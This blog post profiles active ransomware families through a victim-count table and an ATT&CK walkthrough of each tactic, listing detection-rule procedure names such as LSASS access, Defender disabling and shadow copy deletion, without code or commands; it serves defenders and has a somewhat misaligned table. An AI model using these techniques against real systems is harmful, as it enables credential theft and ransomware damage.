There are many variants of Ransomware, however in this blog I researched some of the most active and destructive Ransomware variants. This blog provides analysis that looks into specific families (mentioned below) and associated activities. I have researched and documented all the information from different Security Researchers, Vendors, CISA, Microsoft, MITRE ATT&CK and Github websites.
The 8 most common Ransomware active groups are:
- Conti/Ryuk
- Pysa
- Clop
- Hive
- Lockbit2.0
- RagnarLocker
- BlackByte
- BlackCat
This blog exhibits the different MITRE ATT&CK Tactics, Techniques and Procedures (TTP) used by different Ransomware groups to have a better understanding of the tactical path taken by the attackers.
The below list shows the Count of Ransomware Victim Organizations and Top Industries being attacked till June 2022.
| Ransomware family | Top location | Count of victim organizations per location | Ransomware family | TOP Industry | Count of victim organizations |
| Conti/Ryuk | United States Great Britain Germany France Canada | 237 38 31 26 24 | Conti/Ryuk | Manufacturer Construction Software development Legal Insurance | 45 19 16 6 |
| Pysa | United States Great Britain Austria Germany Canada | 67 14 9 5 4 | Pysa | Education Manufacturer | 18 3 |
| Clop | United States Canada Italy Austria Germany | 54 6 6 6 5 | Clop | Software development Legal Manufacturer Education Consulting | 9 8 5 4 3 |
| Hive | United States China Germany Australia Belgium Netherlands | 28 3 3 2 2 2 | Hive | Small business Hospital Legal Real estate Transport | 14 7 5 4 4 |
| Everest | France United States Canada Austria Italy | 14 13 9 7 4 | Ragnarlocker | Manufacturer Software development Legal Pharmaceutical Aircraft building | 3 3 2 2 2 |
| Ragnarlocker | United States India France Slovakia Spain | 13 4 2 2 2 | Lockbit | Small business Legal | 12 2 |
| Lockbit | United States Italy Great Britain Mexico Brazil | 7 7 3 2 2 | BlackCat | Small business Manufacturer Consulting | 6 3 2 |
| BlackCat | United States Italy Austria Hong Kong Switzerland | 5 3 3 1 1 | BlackByte | Small business Construction Consulting | 5 2 2 |
| Vicesociety | United States Germany New Zealand Netherlands Canada | 11 2 1 1 1 | |||
| BlackByte | United States Germany Russia Netherlands Mexico | 11 3 1 1 1 |
Security professionals may learn about different stages of the attack path, to get a visual description of how to defend against different classes of attack and to know the associated SIGMA detection rules from GitHub, which can be applied to infrastructure as part of your own SIEM solutions.
In Part-1 will learn the TTP’s and SIGMA Rules associated with it and in Part-2 will discuss How Microsoft can help different Organizations to counter Ransomware attacks.
**********************************************************************************************************************
Tactics – Initial Access
Initial Access used to gain a foothold includes targeted spear phishing and exploitation of vulnerabilities on public web servers. Footholds obtained through initial login may allow continuous access, such as valid accounts and the use of external remote services.
Techniques Used by different Variants
Attackers can take advantage of externally facing remote services to initially gain access to and/or remain in a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal corporate network resources from remote locations. There are often remote service gateways that manage connections and credentials for these services. Services such as RDP and VNC can also be used externally.
Some procedures include:
- Enabling RDP via Registry
- Enabling RDP in Windows Firewall
Attackers may attempt to exploit a vulnerability in an Internet-accessible Web services or program by using software, data, or commands to cause unintended or unexpected behavior. The weak point in the system can be a bug or a design flaw. These applications are often websites, but can include databases (like SQL), standard services (like SMB or SSH), network device management and management protocols (like SNMP and Smart Install), and any other application with open sockets accessible from the Internet, such as web servers and related services.
Some procedures includes:
- Windows Shell Start by Web Applications
Attackers can send phishing messages to gain access to victim systems. All forms of phishing are social engineering delivered electronically. Phishing can be targeted, known as spear phishing. With spear phishing, a specific person, company or industry is targeted by the attacker. In general, attackers can perform untargeted phishing, such as in bulk malware spam campaigns.
**********************************************************************************************************************
Tactics – Execution
Execution includes methods that cause an attacker to execute controlled code on a local or remote system. Malicious code execution techniques are often combined with other tactics to achieve broader goals, such as exploring a network or stealing data. For example, an attacker could use a remote access tool to run a PowerShell script that performs a remote discovery of the system.
Techniques Used by different Variants
Attackers can rely on users to open malicious files for execution. Users may be socially engineered to open files that would lead to code execution. This user action is often seen as a continuation of a phishing attachment. Attackers can use several file types that require user execution, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.
Some procedures include:
- Started windows shell from Trusted process
- Drop Execution File from by Trusted Process
Attackers can abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages allow interaction between computer systems and are a common feature of many different platforms. Most systems have some built-in command-line interfaces and scripting capabilities, for example, macOS and Linux distributions include some Unix Shell, while Windows installations include Windows Command Shell and PowerShell.
Some procedures include:
- Execution of Downloaded Powershell Code
- Encoded/decoded PowerShell Сode Execution
- Executing PS1 from Public Directory
- Powershell Suspicious Arguments
- Executing JavaScript from Public Directories
Attackers can abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administrative tool that provides a unified environment for accessing Windows system components. WMI services support local and remote access, but the latter is facilitated by remote services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM). DCOM remote WMI runs on port 135, while WinRM WMI runs on port 5985 over HTTP and 5986 over HTTPS.
Some procedures include:
- Suspicious Command wmic.exe
- Suspicious Child Process Wmiprvse.exe
**********************************************************************************************************************
Tactics – Persistence
Persistence includes techniques that attackers use to maintain access to the system even after reboots, changing credentials and other disruptions that can break access. Techniques used to ensure persistence include any access, manipulation, or configuration changes that allow them to maintain stability in the system, such as legitimate code replacement or hijacking or adding boot code.
Techniques Used by different Variants
Attackers can abuse the Windows Task Scheduler to schedule the initial or recurring execution of malicious code. There are several ways to access Task Scheduler in Windows. The schtasks utility can be run directly from the command line, or Task Scheduler can be opened from the GUI in the Administrative Tools section of Control Panel. In some cases, opponents have used a .NET wrapper for the Windows Task Scheduler, and opponents have also used Windows’ netapi32 library to create a scheduled task.
Some procedures include:
- Scheduled Task Start from Public Directory
- Windows Shell Started Schtasks
Attackers can achieve persistence by adding a program to a startup folder or referencing it with a registry key. Adding an entry to “run keys” in the registry or startup folder causes the referenced program to run when a user logs in. These programs run in the context of the user and have the privilege level associated with the account.
Placing a program in a startup folder also causes that program to run when a user logs on. There is a startup folder for individual user accounts, as well as a system-wide startup folder that is checked regardless of which user account logs in.
Some procedures include:
- Modification of Main Registry Run Keys
- Adding Path of Open Folder in Run Keys via Registry
- Adding Suspicious File in Autorun Keys via Registry
- Suspicious File Creation in Startup Folder
Attackers can manipulate accounts to maintain access to victim systems. Account manipulation can be any action that preserves attackers’ access to a compromised account, such as Changing credentials or authorization groups. These actions may also include account activity designed to circumvent security policies, such as performing iterative password updates to circumvent password expiration policies and preserve the life of information compromised identification.
Some procedures include:
- Account Creation via Powershell
- Account Creation via net.exe
- Adding Account in Domain or Local Admin Group via net.exe
- Adding Account in Domain or Local Admin Group via PowerShell
Attackers can create or modify Windows services to repeatedly run malicious payloads as part of persistence. When Windows starts, it starts programs or applications called services that perform system functions in the background. Windows service configuration information, including the path to service executables or recovery programs/commands, is stored in the Windows registry. Attackers can install a new service or modify an existing service that runs at startup to persist on a system. Service configurations can be set or changed using system utilities (such as sc.exe), by directly editing the registry, or by interacting directly with the Windows API.
Some procedures include:
- Service Installation from Non-System Directory
- Service Image Path Modification via sc.exe
Attackers can abuse BITS tasks to persistently execute or clean up malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth asynchronous file transfer mechanism provided through the component object model (COM). BITS is commonly used by updaters, messengers, and other applications that prefer to work in the background (using available idle bandwidth) without interrupting other network applications. File transfer jobs are implemented as BITS jobs that contain a queue of one or more file operations.
Some procedures include:
- File Download via Bitsadmin
- Suspicious Jobs via Bitsadmin
**********************************************************************************************************************
Tactics – Privilege Escalation
Privilege escalation is a technique that attackers use to obtain higher permissions on a system or network. Opponents can often enter and explore a network with unprivileged access, but they require high permissions to achieve their goals. Common approaches are to exploit system weaknesses, misconfigurations, and vulnerabilities. Examples of elevated access include:
- SYSTEM / root level
- local administrator
- user account with administrator access
- user account with access to a specific system or perform a specific function
Techniques Used by different Variants
Attackers can bypass UAC (User Access Control) mechanisms to increase process privileges on the system. Windows (UAC) allows a program to increase its privileges (tracked as integrity levels ranging from low to high) to perform a task with administrator-level permissions, possibly prompting the user for confirmation. The impact on the user ranges from denying the operation with an elevated application to allowing the user to perform the action if they are in the local administrators group and click the prompt or enter an administrator password to complete the action.
Some procedures include:
- UAC Bypass via COM Object
- Disabling UAC via Registry
Attackers can exploit software vulnerabilities in an attempt to escalate privileges. Exploitation of a software vulnerability occurs when an attacker exploits a programming flaw in an operating system program, service, software, or kernel itself to execute adversary-controlled code. Security constructs such as permission levels often restrict access to information and the use of certain techniques, so attackers will likely need to escalate privileges to include using software exploitation to circumvent those restrictions.
Some procedures include:
- Created Windows Shell from Critical Windows Process
Attackers can modify access tokens to operate under a different user or system security context to perform actions and circumvent access controls. Windows uses access tokens to determine ownership of a running process. A user can manipulate access tokens to make a running process appear to be the child of another process or to belong to someone other than the user who started the process. When this happens, the process also inherits the security context associated with the new token.
Some procedures include:
- Get-System Detection (Empire, CobaltStrike, Metasploit Meterpreter)
**********************************************************************************************************************
Tactics – Defense Evasion
Defense evasion consists of techniques used by attackers to avoid detection when compromised. Techniques used to evade defenses include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Attackers also use and abuse trusted processes to hide and mask their malware. Other tactical techniques are listed here if those techniques have the added benefit of undermining defenses.
Techniques Used by different Variants
Attackers can evade process-based and/or signature-based defenses by proxy execution of malicious content with signed or otherwise trusted binaries. The binaries used in this technique are often files signed by Microsoft, indicating that they have been downloaded from Microsoft or are already included with the operating system. Binary files signed with trusted digital certificates typically run on Windows systems that are protected by digital signature validation. Several Microsoft-signed binaries that are standard in Windows installations can be used to proxy other files or commands.
Some procedures include:
- Shell Creation by Mshta.exe
- External HTA file Execution
- Executing HTA file from Public Directory
- Shell Creation by Regsvr32.exe
- External DLL Execution via Regsvr32.exe
- Shell Creation by Rundll32.exe
- External DLL Execution via Rundll32
- Suspicious Rundll32.exe Arguments
Attackers can inject code into processes to bypass process-based defenses and potentially elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Executing code in the context of another process can allow access to process memory, system/network resources, and possibly elevated privileges. Execution via process injection can also evade detection by security products by hiding the execution under a legitimate process.
Some procedures include:
- Remote Thread Creation in Critical Process
- DLL Injection via LoadLibrary API
Attackers can modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This can take several forms, such as terminating security software processes or services, modifying/deleting registry keys or configuration files so that tools do not work properly, or other methods of interfering with the security software. analysis of security tools or the communication of information.
Some procedures include:
- Disabling Windows Defender via Registry
- Disabling or Modification Windows Defender via PowerShell
- Windows Defender Exclusions Modification via Registry
Attackers can disable or modify system firewalls to bypass controls that limit network usage. Changes can include disabling the entire mechanism, adding, removing, or modifying specific rules. This can be done in a number of ways depending on your operating system, including using the command line, editing Windows registry keys, and the Windows Control Panel.
Some procedures include:
- Disabling Windows Firewall via Netsh.exe
- Firewall Configuration Modification via Netsh.exe
Attackers can attempt to manipulate the characteristics of their artifacts to make them appear legitimate or harmless to users and/or security tools. Masquerade occurs when the name or location of a legitimate or malicious object is tampered with or misused to evade defense and surveillance. This can include manipulating file metadata, tricking users into misidentifying the file type, and assigning legitimate task or service names.
Some procedures include:
- Executing File Named as System Process in Unusual Directory
- Anomaly in the Windows Critical Process Tree
- Created Windows Shell from Critical Windows Process
Attackers can clear Windows event logs to hide intrusion activity. Windows event logs are a record of a computer’s alerts and notifications. There are three system-defined event sources: system, application, and security, with five types of events: error, warning, information, success, and error checking.
Some procedures include:
- Clear Windows Event Logs via Command Line
- Clear Windows Event Logs
Attackers can delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-proprietary files released or created on a system by an attacker (eg Ingress Tool Transfer) can leave traces to indicate what was done within a network and how. Deletion of these files can occur during an intrusion or as part of a post-intrusion process to minimize the attacker’s footprint.
Some procedures include:
- Ping and File Deletion in Command line
Attackers can use obfuscated files or information to hide scan intrusion artifacts. They may need separate mechanisms to crack or decrypt this information depending on how they intend to use it. Methods to do this include built-in malware functionality or using utilities present on the system.
Some procedures include:
- Encoded/decoded PowerShell Сode Execution
**********************************************************************************************************************
Tactics – Credential Access
Credential Access consists of techniques for stealing credentials such as account names and passwords. Techniques used to obtain credentials include keylogging or credential dumping. Using legitimate credentials can allow attackers to log into systems, make them harder to detect, and allow them to create multiple accounts to achieve their goals.
Techniques Used by different Variants
Attackers can attempt to access reference material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs in, the system generates and stores a variety of reference materials in LSASS process memory. These credentials can be collected by an administrative user or by System and used to perform lateral movements using alternative credentials.
Some procedures include:
- Suspicious LSASS Memory Access
- Detected Access to SAM,SYSTEM and SECURITY registry hives
Attackers can acquire credentials from web browsers by reading files specific to the target browser. Web browsers typically store login information, such as website usernames and passwords, so there is no need to enter them manually in the future. Web browsers typically store credentials in an encrypted format in a credential store; However, there are methods to extract plain text credentials from web browsers.
Some procedures include:
- Suspicious Access to Credentials from Web Browsers
Attackers can use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. Without knowing the password for an account or group of accounts, an attacker can systematically guess the password using a repetitive or iterative mechanism. Brute-force passwords can be created by interacting with a service that checks the validity of those credentials, or offline using previously captured credentials, such as a password Hashes.
**********************************************************************************************************************
Tactics – Discovery
Discovery consists of techniques that an adversary can use to gain knowledge about the system and the internal network. These techniques help opponents observe and orient themselves before deciding how to act. They also allow attackers to explore what they can control and what is close to their entry point to find out how it can benefit their current target. Native operating system tools are often used for this purpose to gather information after compromise.
Techniques Used by different Variants
Attackers can try to obtain a list of network connections to or from the compromised system they currently have access to or from external systems by querying the network for information.
An adversary who gains access to a system that is part of a cloud-based environment can map virtual private clouds or virtual networks to determine which systems and services are connected. The actions performed are likely to be the same types of detection techniques, depending on the operating system, but the resulting information may contain details about the networked cloud environment relevant to the attacker’s goals. Cloud service providers may have different ways in which their virtual networks work. Likewise, attackers accessing network devices can perform similar detection activities to gather information about connected systems and services.
Some procedures include:
- System Network Connections Discovery via Standard Windows Utilities
- System Network Connections Discovery via PowerShell
Attackers can try to get a list of other systems by IP address, host name or other logical identifier on a network that can be used for lateral movement of the current system. There may be features in the remote access tools to make this possible, but you can also use utilities available on your operating system, such as Ping or netview.
Some procedures include:
- Remote System Discovery via Standard Windows Utilities
- Remote System Discovery via PowerShell
Attackers can search shared folders and drives on remote systems to identify sources of harvestable information as precursors to harvesting and identify potential systems of interest for lateral movement. Networks often contain shared network drives and folders that allow users to access directories of files on different systems on a network.
Some procedures include:
- Network Share Discovery via Standard Windows Utilities
- Network Share Discovery via PowerShell
Attackers may attempt to get a listing of accounts on a system or within an environment.
Some procedures include:
- Account Discovery via Standard Windows Utilities
- Account Discovery via PowerShell
Attackers can enumerate files and folders or search specific locations on a host or network share for particular information within a file system. Attackers can use information from file and directory detection during automatic detection to model follow-up behavior, including whether or not the opponent fully infects the target and / or attempts specific actions.
Many command shell tools can be used to obtain this information. Examples are dir, tree, ls, find and seek. Custom tools can also be used to collect file and directory information and to interact with the native API. Attackers can also use a network device command line interface on network devices to gather file and directory information.
Adversaries can try to get information about the processes running on a system. The information obtained can be used to obtain detailed information on common software / applications running on systems within the network. Attackers can use Process Discovery information during automatic detection to model follow-up behavior, including whether or not the opponent fully infects the target and / or attempts to take specific actions.
Some procedures include:
- Process Discovery via Standard Windows Utilities
- Process Discovery via PowerShell
**********************************************************************************************************************
Tactics – Lateral Movement
Lateral movement consists of techniques used by attackers to penetrate and control remote systems on a network. In order to achieve their main objective, they often have to browse the network to find their target and then access it. In order to achieve their goal, they often have to go through multiple systems and accounts to win. Attackers can install their own remote access tools to perform lateral moves or use legitimate credentials with native network and operating system tools that can be stealthier.
Techniques Used by different Variants
Attackers can use valid accounts to access a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The opponent can then perform actions as a logged in user.
In a corporate environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to log in with a set of credentials across the entire network. If an attacker can obtain a set of valid domain credentials, they can log into many different machines using remote access protocols such as Secure Shell (SSH) or Remote Desktop Protocol (RDP).
Some procedures include:
- Enabling RDP via Registry
- Enabling RDP in Windows Firewall
Attackers can use valid accounts to communicate with a remote network share using Server Message Block (SMB). The attacker can then perform actions as a logged in user.
SMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Attackers can use SMB to communicate with file shares, allowing them to move sideways across a network. Linux and macOS implementations of SMB usually use Samba.
Some procedures include:
- PsExec Suspicious Commands
- PsExec Pipes Artefacts
- Mounting Shares via net
- Using Explicit Credentials while mounting Share
Attackers can transfer tools or other files between systems in a compromised environment. Once introduced into the victim’s environment (i.e. Ingress Tool Transfer), files can then be copied from one system to another to deliver adversary tools or other files during an operation. Attackers can copy files between victims’ internal systems to support lateral movement using inherent file sharing protocols such as file sharing over SMB/Windows Admin Shares to connected network shares or with authenticated connections via Remote Desktop Protocol.
Some procedures include:
- File Download via Bitsadmin
- Psexec Suspicious Commands
- PsExec Pipes Artifacts
- Mounting Shares via net
- Using Explicit Credentials while mounting Share
**********************************************************************************************************************
Tactics – Command and Control
Command and Control consists of techniques that adversaries can use to interact with systems under their control within a victim network. Attackers usually try to mimic expected normal traffic to avoid detection. There are many ways an opponent can gain command and control with varying levels of invisibility, depending on the structure of the network and the victim’s defenses.
Techniques Used by different Variants
Attackers can communicate via application layer protocols to avoid network detection/filtering by interfering with existing traffic. Commands to the remote system, and often the results of those commands, are embedded in the protocol traffic between client and server.
Attackers can use many different protocols, including those used for web browsing, file transfer, email, or DNS. For connections that occur internally within an enclave (such as those between a proxy or hub node and other nodes), commonly used protocols are SMB, SSH, or RDP.
**********************************************************************************************************************
Tactics – Exfiltration
Exfiltration consists of techniques that attackers can use to steal data from your network. Once they have collected data, attackers often package it to avoid detection when deleting it. This may include compression and encryption. Techniques for retrieving data from a target network typically involve transmission over its command and control channel or an alternate channel, and may also involve imposing size limits on the transmission.
Techniques Used by different Variants
Attackers can steal data by exfiltrating it through an existing command and control channel. The stolen data is encoded in the normal communication channel, using the same protocol as command and control communications.
Attackers can exfiltrate data into a cloud storage service rather than through their main command and control channel. Cloud storage services allow you to store, modify and retrieve data from a remote cloud storage server on the Internet.
Examples of cloud storage services include One Drive and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of coverage to the adversary if hosts within the network are already communicating with the service.
**********************************************************************************************************************
Tactics – Impact
The impact consists of techniques used by attackers to disrupt availability or compromise integrity by manipulating business and operational processes. Techniques used for impact may include destruction or manipulation of data. In some cases, business processes may appear to be good, but may have been altered to further adversary goals. These techniques can be used by adversaries to achieve their end goal or to cover up a breach of confidentiality.
Techniques Used by different Variants
Attackers can delete or delete embedded operating system data and disable services designed to help recover a damaged system to prevent recovery. This can prevent access to available backups and restore options.
Operating systems may include features that can help repair corrupted systems, such as Backup catalog, volume shadow copies, and automatic repair functions. Attackers can disable or remove system restore features to increase the effects of data destruction and data encryption for impact.
Some procedures include:
- Shadow Copies Deletion
- Disable Automatic Windows Recovery
Adversaries can stop or disable services on a system to make those services unavailable to legitimate users. Stopping critical services or processes can inhibit or interrupt the response to an incident or help the opponent’s overall goals of causing environmental damage.
Some procedures include:
- Service Stop via taskkill
- Service Stop via sc.exe
- Service Stop via Powershell.exe
- Service Stop via net.exe
**********************************************************************************************************************
♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥Thank You for Reading, See you in the next Blog♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥